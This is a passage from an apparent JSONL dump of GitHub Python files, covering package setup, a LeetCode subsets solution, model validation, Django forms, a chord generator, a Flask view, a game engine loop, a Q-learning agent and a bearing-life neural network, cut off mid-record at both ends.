author_email=\"hugosemianoviana@gmail.com\",\n description=\"Lazy python print utilities\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/hugo-viana/lazyprint\",\n project_urls={\n \"Bug Tracker\": \"https://github.com/hugo-viana/lazyprint/issues\",\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n package_dir={\"\": \"src\"},\n packages=setuptools.find_packages(where=\"src\"),\n 
python_requires=\">=3.6\",\n)","repo_name":"hugo-viana/lazyprint","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37592102471","text":"class Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n ans = []\n l = 0\n n = len(nums)\n nums.sort()\n # get all subsets of each length\n for l in range(n + 1):\n result = []\n self.get_sets(l, [], result, nums, 0, n)\n for x in result:\n ans.append(list(x))\n \n return ans\n \n # get subsets of a particular length from nums\n def get_sets(self, l, item, result, nums, start, n):\n if (l == len(item)):\n result.append(list(item))\n return\n if (l < len(item)):\n return\n for i in range(start, n):\n item.append(nums[i])\n self.get_sets(l, item, result, nums, i + 1, n)\n item.pop()\n","repo_name":"goelhardik/programming","sub_path":"leetcode/subsets/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1377751338","text":"import torch\nimport numpy as np\nfrom sklearn.metrics import classification_report, confusion_matrix, average_precision_score\nfrom torch.utils.data import DataLoader\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef validate(val_loader: DataLoader, model, loud=False, print_classification_report=False, return_predictions=False,\n return_probabilities=False):\n \"\"\"\n Makes validation of the model using validation dataset.\n\n Parameters:\n - val_loader - DataLoader with validation dataset which consists labels\n - model - model which is going to be validated\n - loud - if set to True prints the score for the model\n - print_classification_report - if set to true prints classification report\n - return_predictions - if set to true returns precision_recall_auc, outputs, targets (float, list, list)\n else returns precision_recall_auc\n - return_probabilities - if return predictions == True and return_probabilities == True,\n list of outputs and targets consists of class probabilities instead of class labels\n\n Returns:\n - precision recall auc for the model or precision recall auc for the model + lists of outputs and targets\n \"\"\"\n\n outputs, outputs_probabilities, targets = [], [], []\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n for i, (features, target) in enumerate(val_loader):\n\n features = features.to(device)\n target = target.to(device)\n\n # compute output\n output, _ = model(features)\n\n # appending values for classification report\n outputs_probabilities = outputs_probabilities + list(output[:, 1].cpu().detach().numpy())\n _, output = torch.max(output.data, 1)\n outputs = outputs + list(output.cpu().detach().numpy())\n targets = targets + list(target.cpu().detach().numpy())\n\n precision_recall_auc = average_precision_score(targets, outputs_probabilities)\n\n if loud:\n print(f'Precision-Recall Score: {precision_recall_auc}')\n if print_classification_report:\n print(f'Classification Report: \\n{classification_report(targets, outputs)}')\n print(f'Confusion Matrix: \\n{np.round(confusion_matrix(targets, outputs), 2)}')\n print(f'Precision-Recall Score: \\n{precision_recall_auc}')\n\n if return_predictions:\n if not return_probabilities:\n return precision_recall_auc, outputs, targets\n else:\n return precision_recall_auc, 
outputs_probabilities, targets\n else:\n return precision_recall_auc\n","repo_name":"DawidSitnik/Application-of-Domain-Adaptation-Techniques-for-Classifying-Particles-Basing-On-the-Data-From-ALICE","sub_path":"utils/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11595259037","text":"from cmath import pi\nimport math\n\nprint(\"Funcion que calcula el area de un triangulo\")\n\nbase_triangulo = float(input(\"Escribe la base del triangulo: \"))\naltura_triangulo = float(input(\"Escribe la altura del triangulo: \"))\nradio_circulo = float(input(\"Escribe el radio del circulo: \"))\n\n\ndef area_triangulo(a, b):\n area = float((a*b)/2)\n print(area)\n\ndef area_circulo(radio):\n pi = math.pi\n area = float(pi * (radio * radio))\n print(\"El radio del circulo es: \", area) \n\narea_triangulo(base_triangulo, altura_triangulo)\narea_circulo(radio_circulo)","repo_name":"vicbassdeveloper/EjerciciosOpenBootCamp","sub_path":"cursopython/Tema5/Ejercicio1.py","file_name":"Ejercicio1.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26899064552","text":"from dataclasses import field\nfrom pyexpat import model\nfrom django import forms\nfrom .models import Profile\n\n\n\n\n\n\n\n\nclass UpdateProfileForm(forms.ModelForm):\n # avatar = forms.ImageField(widget=forms.FileInput(attrs={'class': 'form-control-file'}))\n # bio = forms.CharField(widget=forms.Textarea(attrs={'class': 'form-control', 'rows': 5}))\n\n class Meta:\n model = Profile\n fields = '__all__'\n exclude = ['user']\nLANGUAGE_CHOICES=(\n ('JAVA','Java'),\n ('JAVASCRIPT','Javascript'),\n ('PYTHON','Python'),\n ('.NET','.Net'),\n )\nclass LanguageForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields= ['language']\n #field = forms.ChoiceField(choices=LANGUAGE_CHOICES, widget=forms.Select(attrs={'onchange': 'submit();'}))\n \n # class Meta:\n # model = Profile\n # fields = ['language']\n","repo_name":"iliyas01/test-repo","sub_path":"hitalent/Hitalent/UI/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12209913281","text":"print(\"Importing packages...\")\nfrom synthesizer import Player, Synthesizer, Waveform\n\nfrom chords.symbol.getComponents import ChordParts\nfrom chords.ngrams.ngrams import NGrams\nfrom chords.chord import Chord\nfrom dataset.readData import rootAndDegrees as readData\nfrom chords.symbol.parts.noteSymbol import Note\nfrom chords.symbol.getComponents import ChordParts\n\nplayer = Player()\nplayer.open_stream()\nsynthesizer = Synthesizer(osc1_waveform=Waveform.triangle, osc1_volume=1, use_osc2=False)\n\n\ndef getKey():\n return Note(input()).toNumber()\n\ndef getChordSequence():\n chords = []\n for chordString in input().split():\n chords += [ChordParts(chordString, key).chord]\n return chords\n\ndef generateNextChord(key, chords, exclude = []):\n ngrams = NGrams(readData())\n\n chordsForNgram = list(map(lambda x: x.getJson(), chords))\n\n print(\"\\nBuilding Ngrams with n = \", len(chordsForNgram) + 1, \"...\")\n ngrams.build(len(chordsForNgram) + 1)\n\n while (len(ngrams.getProbs(chordsForNgram)) == 0):\n chordsForNgram = chordsForNgram[1:]\n print(\"No Ngrams, building with n = \", len(chordsForNgram) + 1, \"...\")\n 
ngrams.build(len(chordsForNgram) + 1)\n\n probs = ngrams.getProbs(chordsForNgram)[:5]\n print(\"\\nMost likely chords:\")\n for prob in probs:\n chordName = Chord(prob[0]['root'], prob[0]['components']).toSymbol(key=key)\n print(f\"{chordName} - {round(prob[1] * 100)}%\")\n print()\n\n nextChordJson, chance = ngrams.getNext(chordsForNgram, exclude)\n\n nextChord = Chord(nextChordJson['root'], nextChordJson['components'])\n\n print(\"Current chord sequence: \", end=\"\")\n for chord in chords:\n print(chord.toSymbol(key=key), end=\" \")\n print()\n print(f\"Next chord: {nextChord.toSymbol(key=key)} - {round(chance * 100)}%\")\n\n def getNextChord():\n playChords(chords + [nextChord])\n print(\"[N]ew chord - [A]dd to sequence - [P]lay again\")\n\n answer = input()\n if (answer == \"A\" or answer == \"a\"):\n return nextChord\n elif (answer == \"P\" or answer == \"p\"):\n return getNextChord()\n else:\n return generateNextChord(key, chords, exclude + [nextChord])\n \n return getNextChord()\n\ndef playChords(chords):\n for chord in chords:\n print(\"Playing\", chord.toSymbol(key=key))\n player.play_wave(synthesizer.generate_chord(chord.getNotes(key=key), 1.0))\n\n\nprint(\"\\nEnter key:\")\nkey = getKey()\nprint(\"\\nEnter chord sequence:\")\nchordSequence = getChordSequence()\nwhile True:\n nextChord = generateNextChord(key, chordSequence)\n chordSequence += [nextChord]\n","repo_name":"felixxwu/Jazz-Chord-Generator","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70763548888","text":"from app import app\nfrom flask import jsonify\nfrom datetime import datetime\nfrom app.models.base import mysql_db\n\n@app.route('/', methods=['GET'])\ndef index():\n utc = datetime.utcnow()\n serverTime = datetime.now()\n message = {\n 'status': 'OK',\n 'utc_time': utc,\n 'time': serverTime\n }\n return jsonify(message)\n\n@app.before_request\ndef before_request():\n mysql_db.connect()\n\n@app.after_request\ndef after_request(response):\n mysql_db.close()\n return response\n\n@app.errorhandler(404)\ndef not_found(error=None):\n message = {\n 'code': 404,\n 'message': 'Not Found: ',\n }\n res = jsonify(message)\n res.status_code = 404\n\n return res\n","repo_name":"madejean/airbnb","sub_path":"api/app/views/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14892991911","text":"import random\r\nimport os\r\nfrom time import sleep\r\n\r\n\r\ndef clear():\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n\r\n\r\ndef welcome():\r\n print(\"\\nWelcome to Memory Game!!\")\r\n print(\"Here i am going to show you a few numbers for 0.7 seconds and you are gonna need to memories them!!\")\r\n\r\n\r\ndef generate_sequence(difficulty):\r\n global random_number\r\n global list_from_random\r\n for number in range(0, int(difficulty)):\r\n random_number = str(random.randint(1, 101))\r\n print(random_number)\r\n list_from_random = list(random_number)\r\n sleep(0.7)\r\n\r\n\r\ndef get_list_from_user():\r\n global the_list\r\n global guess_number\r\n print(\"Please enter the numbers you remember: \")\r\n guess_number = input()\r\n list_of_user = list(guess_number)\r\n if list_of_user == list_from_random:\r\n print(\"You won!!\")\r\n else:\r\n print(list_of_user, list_from_random)\r\n\r\n\r\ndef play(difficulty):\r\n clear()\r\n welcome()\r\n 
generate_sequence(difficulty)\r\n clear()\r\n print(\"Your time ended!!\")\r\n get_list_from_user()\r\n","repo_name":"simcah-qb/world_of_games","sub_path":"MemoryGame.py","file_name":"MemoryGame.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19178441671","text":"\"\"\"Director\r\n\r\nThis module define the Director singleton object that \r\n\"\"\"\r\n\r\n__all__ = [\r\n \"Director\",\r\n ]\r\n\r\nimport time\r\n\r\n\r\nfrom Opioid2D.internal.utils import deprecated\r\nfrom Opioid2D.internal.objectmgr import ObjectManager\r\nfrom Opioid2D.public.Image import ImageMeta\r\nfrom Opioid2D.public.ResourceManager import ResourceManager\r\nimport sys, traceback\r\n\r\nclass Director(object):\r\n \"\"\"Director\r\n\r\n The Director singleton is the main controller of the software\r\n runtime. It handles transitions from one scene to another, updates\r\n the screen and calls event and collision handlers.\r\n \"\"\"\r\n _cDirector = None\r\n \r\n @deprecated\r\n def Run(self, initialScene, *args, **kw):\r\n return self.run(initialScene, *args, **kw)\r\n \r\n def run(self, initialScene, *args, **kw):\r\n \"\"\"Run the Director mainloop until program exit\r\n \"\"\"\r\n try:\r\n # This is a long and ugly function that hasn't been splitted into smaller parts\r\n # because of performance considerations.\r\n #\r\n \r\n import pygame\r\n pygame.init()\r\n from Opioid2D.public.Mouse import Mouse\r\n \r\n # Bind functions to local names in order to increase performance\r\n sleep = time.sleep\r\n throttle = pygame.time.Clock()\r\n flip = pygame.display.flip\r\n get_ticks = pygame.time.get_ticks\r\n cD = self._cDirector\r\n OM = ObjectManager\r\n \r\n self._scene = None\r\n self.next_scene = None\r\n self.next_state = None\r\n \r\n now = get_ticks()\r\n cD.Start(now)\r\n\r\n self.set_scene(initialScene, *args, **kw)\r\n \r\n self._running = True \r\n start = time.time()\r\n frames = 0\r\n self.delta = 0\r\n ticker = cD.GetTicker()\r\n old_ticks = now\r\n self.now = now\r\n \r\n # Preload Image subclasses that have been imported and that\r\n # contain the preload flag.\r\n for img in ImageMeta.subclasses:\r\n if img.preload:\r\n ResourceManager.get_image(img)\r\n \r\n while self._running:\r\n # Trigger possible scene change at the beginning of a new frame\r\n if self.next_scene is not None:\r\n self._change_scene()\r\n \r\n # Time delta calculation\r\n ticks = get_ticks()\r\n self.delta = delta = min(ticks-old_ticks, 25) # limit the virtual clock to a max. 
advance of 25ms per frame\r\n old_ticks = ticks\r\n self.now = now = now + delta\r\n cD.Iterate(now)\r\n \r\n scene = self._scene\r\n cscene = scene._cObj\r\n cscene.Tick()\r\n \r\n # Event handling\r\n ev = pygame.event.get()\r\n if scene._gui is not None:\r\n scene._gui.tick(ev)\r\n scene._handle_events(ev)\r\n \r\n # Call Scene tick callbacks\r\n if scene._tickfunc is not None:\r\n scene._tickfunc()\r\n if ticker.realTick:\r\n if scene._realtickfunc is not None:\r\n scene._realtickfunc()\r\n \r\n # Manage state change within the scene\r\n while self.next_state is not None:\r\n s = self.next_state\r\n self.next_state = None\r\n self.scene._init_state(s)\r\n \r\n # Update the screen\r\n cD.RenderFrame()\r\n \r\n # render software mouse cursor\r\n ms = Mouse._sprite\r\n if ms:\r\n ms.position = Mouse.position\r\n ms._cObj.TraverseFree()\r\n \r\n flip()\r\n \r\n # Purge managed C++ objects that have been killed on the C++ side.\r\n OM.purge()\r\n \r\n frames += 1\r\n throttle.tick(100) # limit FPS to 100 for lower CPU usage\r\n end = time.time()\r\n finally:\r\n from Opioid2D import _opi2d\r\n _opi2d.cleanup()\r\n return frames/(end-start)\r\n\r\n @deprecated\r\n def SetScene(self, sceneClass, *args, **kw):\r\n self.set_scene(sceneClass, *args, **kw)\r\n @deprecated\r\n def GetScene(self):\r\n return self.get_scene()\r\n\r\n def set_scene(self, sceneClass, *args, **kw):\r\n \"\"\"Change to a new Scene\"\"\"\r\n self.next_scene = sceneClass, args, kw\r\n def get_scene(self):\r\n \"\"\"Get the currently active Scene\"\"\"\r\n return self._scene\r\n scene = property(get_scene, set_scene)\r\n\r\n @deprecated\r\n def GetTime(self):\r\n return self.get_time()\r\n\r\n def get_time(self):\r\n return self._cDirector.GetTicker().now\r\n time = property(get_time)\r\n\r\n @deprecated\r\n def GetDelta(self):\r\n return self.get_delta()\r\n \r\n def get_delta(self):\r\n return self.delta\r\n\r\n @deprecated\r\n def Quit(self):\r\n self.quit()\r\n \r\n def quit(self):\r\n \"\"\"Exit the Director mainloop.\r\n\r\n You only need to call this if you have called Director.Run()\r\n and want to stop executing it.\r\n \"\"\"\r\n self._running = False\r\n\r\n def _change_scene(self):\r\n sceneClass, args, kw = self.next_scene\r\n self.next_scene = None\r\n if self._scene is not None:\r\n self._scene.exit()\r\n self._scene = sceneClass()\r\n self._cDirector.SetScene(self.scene._cObj)\r\n self._scene.enter(*args, **kw)\r\n \r\n \r\nDirector = Director()\r\n","repo_name":"sunsp1der/opioid2d","sub_path":"pyimpl/Opioid2D/public/Director.py","file_name":"Director.py","file_ext":"py","file_size_in_byte":5896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72177384728","text":"from agent.agent import *\nimport numpy as np\nimport jax\nimport jax.numpy as jnp\nfrom functools import partial\nfrom utils.sampling import sample_batch_index\n\nclass QAgent(OnlineAgent):\n def __init__(self,*args,temp=1.,alpha_q=0.1,informed=False,scaled_beta=False,**kwargs):\n super().__init__(*args,**kwargs)\n self.reset()\n\n self.temp = temp\n self.alpha_q = alpha_q\n self.informed = informed\n self.scaled_beta = scaled_beta\n\n self.memory_reward = []\n self.memory_action = []\n\n def reset(self):\n self.q_values = np.zeros(self.env.n_symbols)\n \n #@partial(jax.jit,static_argnums=0)\n def forward(self,obs):\n q_val = self.q_values[np.array(obs)]\n temp = self.temp\n if self.scaled_beta == 'cheat':\n temp *= self.env.get_current_range()\n elif self.scaled_beta == 'memory':\n if 
max(self.q_values) != min(self.q_values):\n temp *= max(self.q_values)-min(self.q_values)\n q_val_temp = q_val/temp\n action_probs = jax.nn.softmax(q_val_temp,axis=1)\n self.log('ActionProbs',action_probs[0])\n actions = sample_batch_index(next(self.rng),action_probs)\n logprobs = jnp.log(action_probs[np.arange(action_probs.shape[0]),np.array(actions)])\n return actions,logprobs\n\n def learn(self,ts):\n (o,a,lp,r,no,d,i) = ts\n chosen_symbol = o[0,a[0]]\n o = o[0]\n\n #Update Q\n self.q_values[chosen_symbol] += self.alpha_q * (r - self.q_values[chosen_symbol])#/np.exp(lp)\n\n def init_new_season(self):\n self.memory_reward.append([])\n self.memory_action.append([])\n\n def train(self,nb_steps):\n o = self.env.reset()\n self.init_new_season()\n for i in range(nb_steps):\n a,lp = self.forward(o)\n no,r,d,_ = self.env.step(a)\n ts = Timestep(o,a,lp,r,no,d,i)\n\n self.memory_reward[-1].append(r)\n self.memory_action[-1].append(a)\n\n self.log('Observation',o[0])\n self.log('Action',a[0])\n self.log('Reward',r[0])\n self.log('Done',d[0])\n self.log('NewObservation',no[0])\n self.log('EnvMini',self.env.min_range[self.env.current_season])\n self.log('EnvMaxi',self.env.max_range[self.env.current_season])\n self.log('EV',self.env.get_ev())\n self.log('QVal',self.q_values)\n\n self.learn(ts)\n if np.any(d):\n if len(self.env.min_range) == self.env.current_season+1:\n return\n self.env.next_season()\n if self.informed == 'cheat':\n self.q_values *= 0\n self.q_values += self.env.get_ev()\n elif self.informed == 'memory':\n unique_actions = np.unique(self.memory_action[-1])\n print(unique_actions)\n self.q_values[:] = self.q_values[unique_actions].mean()\n \n self.init_new_season()\n o = no\n else:\n o = no\n","repo_name":"Daetheys/EcologicalRange","sub_path":"agent/q_agent.py","file_name":"q_agent.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31241650002","text":"import matplotlib.pyplot as plt\r\nimport os\r\nimport csv\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\n#-------------------------------------------Data Preprocessing----------------------------------------------\r\n\r\ndef getTime(h, m, s, ms):\r\n return h * 3600 + m * 60 + s + ms * (10 ** -6)\r\n\r\ndef load_data(learning, condition, bearing, filelength, shrinkBy = 100):\r\n subfolder = 'Full_Test_Set'\r\n if(learning):\r\n subfolder = 'Learning_set'\r\n # These are used for input calculations ------\r\n time = []\r\n v_acc = []\r\n life_time = 0\r\n # These are temporary\r\n t = []\r\n v = []\r\n found = 0\r\n first = 1\r\n start = 0.0\r\n for i in range(1,filelength):\r\n num = str(i)\r\n zero_filled = num.zfill(5)\r\n with open(os.path.join('ieee-phm-2012-data-challenge-dataset-master',subfolder,'Bearing'+str(condition)+'_'+str(bearing),'acc_' + zero_filled + '.csv')) as csvfile:\r\n plots = csv.reader(csvfile, delimiter=',')\r\n for row in plots:\r\n if(first):\r\n start = getTime(float(row[0]), float(row[1]), float(row[2]), float(row[3]))\r\n t.append(0)\r\n v.append(float(row[5]))\r\n first = 0\r\n else:\r\n t.append(round(getTime(float(row[0]), float(row[1]), float(row[2]), float(row[3])) - start, 6))\r\n v.append(float(row[5]))\r\n if(abs(float(row[5])) > 20):\r\n life_time = round(getTime(float(row[0]), float(row[1]), float(row[2]), float(row[3])) - start, 6)\r\n found = 1\r\n break\r\n 
if(found):\r\n break\r\n #print('Loaded Dataset')\r\n # Shrinking the data from t and v to time and v_acc\r\n itr = int(len(t) / shrinkBy)\r\n remainingEle = len(t) % shrinkBy \r\n # print(\"Remaining elements: \",remainingEle)\r\n for i in range(itr):\r\n startIndex = i * shrinkBy\r\n endIndex = startIndex + shrinkBy\r\n time.append(np.mean(t[startIndex:endIndex]))\r\n maxEle = 0\r\n for j in range(startIndex, endIndex):\r\n if(abs(v[i]) > abs(maxEle)):\r\n maxEle = v[i]\r\n v_acc.append(maxEle)\r\n # For remaining elements if any\r\n if (remainingEle > 0):\r\n time.append(np.mean(t[itr * shrinkBy : ]))\r\n maxEle = 0\r\n for j in range(itr * shrinkBy, len(v)):\r\n if(abs(v[j]) > abs(maxEle)):\r\n maxEle = v[j]\r\n v_acc.append(maxEle)\r\n #print('Shrunk by',shrinkBy)\r\n if(life_time == 0):\r\n life_time = time[-1]\r\n return time, v_acc, life_time\r\n\r\ndef preprocess_dataset(time, v_acc, window_size=100):\r\n # rolling rms -------------------\r\n rolling_rms = pd.Series(v_acc).pow(2).rolling(window_size).apply(lambda x: np.sqrt(x.mean()))\r\n rolling_rms = rolling_rms.dropna() \r\n #print(\"Calculated Rolling RMS\")\r\n \r\n # rolling kurtosis -------------------\r\n rolling_kurt = pd.Series(v_acc)\r\n rolling_kurt = rolling_kurt.rolling(window_size).kurt()\r\n rolling_kurt = rolling_kurt.dropna()\r\n #print(\"Calculated Rolling Kurtosis\")\r\n \r\n # rolling time ------------------\r\n rolling_time = pd.Series(time)\r\n rolling_time = rolling_time.rolling(window_size).mean()\r\n rolling_time = rolling_time.dropna()\r\n #print(\"Calculated Rolling Time\")\r\n \r\n # Weibull constants -------------------\r\n # for RMS\r\n etaRMS = 1.2017\r\n gammaRMS = 0.4077\r\n etaByGammaRMS = etaRMS / gammaRMS\r\n # for Kurtosis\r\n etaKurt = 1.2970\r\n gammaKurt = 0.4360\r\n etaByGammaKurt = etaKurt / gammaKurt\r\n \r\n # Weibull Hazard for RMS ------------------\r\n weibull_hazardRMS = []\r\n for i in rolling_rms:\r\n if(i > 0):\r\n weibull_hazardRMS.append(round(etaByGammaRMS * ((i / gammaRMS) ** (etaRMS - 1)), 6))\r\n else: \r\n weibull_hazardRMS.append(0)\r\n #print(\"Calculated Weibull RMS\")\r\n \r\n # Weibull Hazard for Kurtosis -------------------\r\n weibull_hazardKurt = []\r\n for i in rolling_kurt:\r\n if(i > 0):\r\n weibull_hazardKurt.append(round(etaByGammaKurt * ((i / gammaKurt) ** (etaKurt - 1)), 6))\r\n else:\r\n weibull_hazardKurt.append(0)\r\n #print(\"Calculated Weibull Kurtosis\")\r\n return rolling_time.tolist(), weibull_hazardRMS, weibull_hazardKurt\r\n\r\ndef split_x_y(life_time, time, weibull_RMS, weibull_Kurt):\r\n x_train = np.empty((1,6), float)\r\n y_train = np.array([round(i/life_time,6) for i in time])\r\n x = np.array([time, weibull_RMS, weibull_Kurt]).transpose()\r\n for i in range(1,x.shape[0]):\r\n x_train = np.append(x_train, np.reshape(np.hstack((x[i-1],x[i])), (-1, 6)), axis=0)\r\n \r\n x_train = x_train[1:]\r\n y_train = y_train[1:]\r\n return x_train, y_train\r\n\r\n#---------------------------------------Neural Net----------------------------------------\r\n\r\nclass NeuralNet():\r\n #A two layer neural network\r\n\r\n def __init__(self, layers=[6, 2, 1], learning_rate=0.001, iterations=100, batch_size = 1000):\r\n self.params = {}\r\n self.learning_rate = learning_rate\r\n self.iterations = iterations\r\n self.loss = []\r\n self.sample_size = None\r\n self.layers = layers\r\n self.X = None\r\n self.y = None\r\n self.batch_size = batch_size\r\n\r\n def init_weights(self):\r\n #np.random.seed(1) # Seed the random number generator\r\n self.params[\"W1\"] = 
np.random.randn(self.layers[0], self.layers[1])\r\n self.params['b1'] = np.random.randn(self.layers[1], )\r\n self.params['W2'] = np.random.randn(self.layers[1], self.layers[2])\r\n self.params['b2'] = np.random.randn(self.layers[2], )\r\n\r\n def relu(self, Z):\r\n return np.maximum(0, Z)\r\n\r\n def dRelu(self, x):\r\n x[x <= 0] = 0\r\n x[x > 0] = 1\r\n return x\r\n\r\n def eta(self, x):\r\n ETA = 0.0000000001\r\n return np.maximum(x, ETA)\r\n\r\n def sigmoid(self, Z):\r\n return 1 / (1 + np.exp(-Z))\r\n\r\n def entropy_loss(self, y, yhat):\r\n nsample = len(y)\r\n yhat_inv = 1.0 - yhat\r\n y_inv = 1.0 - y\r\n yhat = self.eta(yhat)\r\n yhat_inv = self.eta(yhat_inv)\r\n loss = -1 / nsample * (np.sum(np.multiply(np.log(yhat), y) + np.multiply((y_inv), np.log(yhat_inv))))\r\n return loss\r\n\r\n def forward_propagation(self, x_, i):\r\n \r\n Z1 = x_.dot(self.params['W1']) + self.params['b1']\r\n A1 = self.sigmoid(Z1)\r\n Z2 = A1.dot(self.params['W2']) + self.params['b2']\r\n yhat = self.relu(Z2)\r\n #loss = self.entropy_loss(self.y, yhat)\r\n# print(\"\\nx: \",x_[:5,:])\r\n# print(\"\\nZ1: \",Z1[:5,:])\r\n# print(\"\\nA1: \",A1[:5,:])\r\n# print(\"\\nZ2: \",Z2[:2,:])\r\n# print(\"\\nyhat: \",yhat[:2,:])\r\n\r\n self.params['Z1'+str(i)] = Z1\r\n self.params['Z2'+str(i)] = Z2\r\n self.params['A1'+str(i)] = A1\r\n\r\n return yhat.reshape(yhat.shape[0])\r\n\r\n def back_propagation(self, x_, y_, yhat, i):\r\n # y_inv = 1 - y_\r\n # yhat_inv = 1 - yhat\r\n # np.divide(y_inv, self.eta(yhat_inv)) - np.divide(y_, self.eta(yhat))\r\n# print(\"\\ni \",i)\r\n# print(\"\\nx \",x_[:5,:])\r\n# print(\"\\nyhat: \",yhat[:5])\r\n dl_wrt_yhat = yhat - y_\r\n dl_wrt_z2 = dl_wrt_yhat * self.dRelu(self.params['Z2'+str(i)].flatten())\r\n dl_wrt_z2 = dl_wrt_z2.reshape(dl_wrt_z2.shape[0],1)\r\n# print(\"dl_wrt_yhat_shape: \",dl_wrt_yhat.shape)\r\n# print(\"dl_wrt_z2_shape: \",dl_wrt_z2.shape)\r\n \r\n# print(\"\\ndl_wrt_yhat: \",dl_wrt_yhat[:2])\r\n# print(\"\\nz2: \",self.params['Z2'+str(i)])\r\n# print(\"\\ndl_wrt_z2: \",dl_wrt_z2[:2])\r\n\r\n dl_wrt_A1 = dl_wrt_z2.dot(self.params['W2'].T)\r\n dl_wrt_w2 = self.params['A1'+str(i)].T.dot(dl_wrt_z2)\r\n dl_wrt_b2 = np.sum(dl_wrt_z2, axis=0, keepdims=True)\r\n\r\n# print(\"\\ndl_wrt_A1: \",dl_wrt_A1[:2])\r\n# print(\"\\ndl_wrt_w2: \",dl_wrt_w2[:2])\r\n# print(\"\\ndl_wrt_b2: \",dl_wrt_b2[:2])\r\n\r\n dl_wrt_z1 = dl_wrt_A1 * self.params['A1'+str(i)] * (np.ones(self.params['A1'+str(i)].shape) - self.params['A1'+str(i)])\r\n dl_wrt_w1 = x_.T.dot(dl_wrt_z1)\r\n dl_wrt_b1 = np.sum(dl_wrt_z1, axis=0, keepdims=True)\r\n \r\n# print(\"\\ndl_wrt_z1: \",dl_wrt_z1[:2])\r\n# print(\"\\ndl_wrt_w1: \",dl_wrt_w1[:2])\r\n# print(\"\\ndl_wrt_b1: \",dl_wrt_b1[:2])\r\n\r\n self.params['W1'] = self.params['W1'] - self.learning_rate * dl_wrt_w1\r\n self.params['W2'] = self.params['W2'] - self.learning_rate * dl_wrt_w2\r\n self.params['b1'] = self.params['b1'] - self.learning_rate * dl_wrt_b1\r\n self.params['b2'] = self.params['b2'] - self.learning_rate * dl_wrt_b2\r\n\r\n\r\n def fit(self, X, y):\r\n self.X = X\r\n self.y = y\r\n # initialize weights and bias\r\n self.init_weights() \r\n \r\n batches = [(X[i:i + self.batch_size,:], y[i:i + self.batch_size]) for i in range(0, X.shape[0], self.batch_size)]\r\n #print(\"batches_shape: \",len(batches))\r\n\r\n for i in range(self.iterations):\r\n for i in range(len(batches)):\r\n x_, y_ = batches[i]\r\n #print(\"x_shape: \",x_.shape)\r\n #print(\"y_shape: \",y_.shape)\r\n yhat = self.forward_propagation(x_, i)\r\n #print(\"yhat_shape: 
\",yhat.shape)\r\n self.back_propagation(x_, y_, yhat, i)\r\n\r\n def predict(self, X):\r\n Z1 = X.dot(self.params['W1']) + self.params['b1']\r\n A1 = self.relu(Z1)\r\n Z2 = A1.dot(self.params['W2']) + self.params['b2']\r\n pred = self.sigmoid(Z2)\r\n return np.round(pred)\r\n\r\n def acc(self, y, yhat):\r\n acc = int(sum(y == yhat) / len(y) * 100)\r\n return acc\r\n\r\n def plot_loss(self):\r\n plt.plot(self.loss)\r\n plt.xlabel(\"Iteration\")\r\n plt.ylabel(\"logloss\")\r\n plt.title(\"Loss curve for training\")\r\n plt.show()\r\n\r\n# nn1 = NeuralNet(layers=[6, 2, 1], learning_rate=0.01, iterations=100)\r\n# nn1.fit(X_train1_1, Y_train1_1)\r\n# print('C1B1: Model Trained')\r\n#nn1.fit(X_train1_2, Y_train1_2)\r\n#print('C1B2: Model Trained')\r\n#\r\n#Y_pred1_3 = nn1.predict(X_test1_3)\r\n#mean_percent_error = np.mean((abs(Y_pred1_3.flatten() - Y_test1_3) / Y_test1_3) * 100)\r\n#predicted_RUL = (1-Y_pred1_3[-1])[0]*life_time1_3\r\n#print('\\nB13 Predicted RUL: ',predicted_RUL,'s')\r\n#print('B13 Actual RUL: ',test_RUL1_3,'s')\r\n#print('Test B13 Mean Error: ',mean_percent_error,'%')\r\n#---------------------------------------Test RULs-------------------------------------------------------\r\n\r\ntest_RUL1_3 = 5730\r\ntest_RUL1_5 = 1610\r\ntest_RUL1_6 = 1460\r\ntest_RUL1_7 = 7570\r\ntest_RUL2_3 = 7530\r\ntest_RUL2_4 = 1390\r\ntest_RUL2_5 = 3090\r\ntest_RUL2_6 = 1290\r\ntest_RUL2_7 = 580\r\ntest_RUL3_3 = 820\r\n\r\n#---------------------------------------Loading and Preprocessing---------------------------------------\r\n \r\nprint('\\nCondition 1: \\n')\r\n\r\ntime, v_acc, 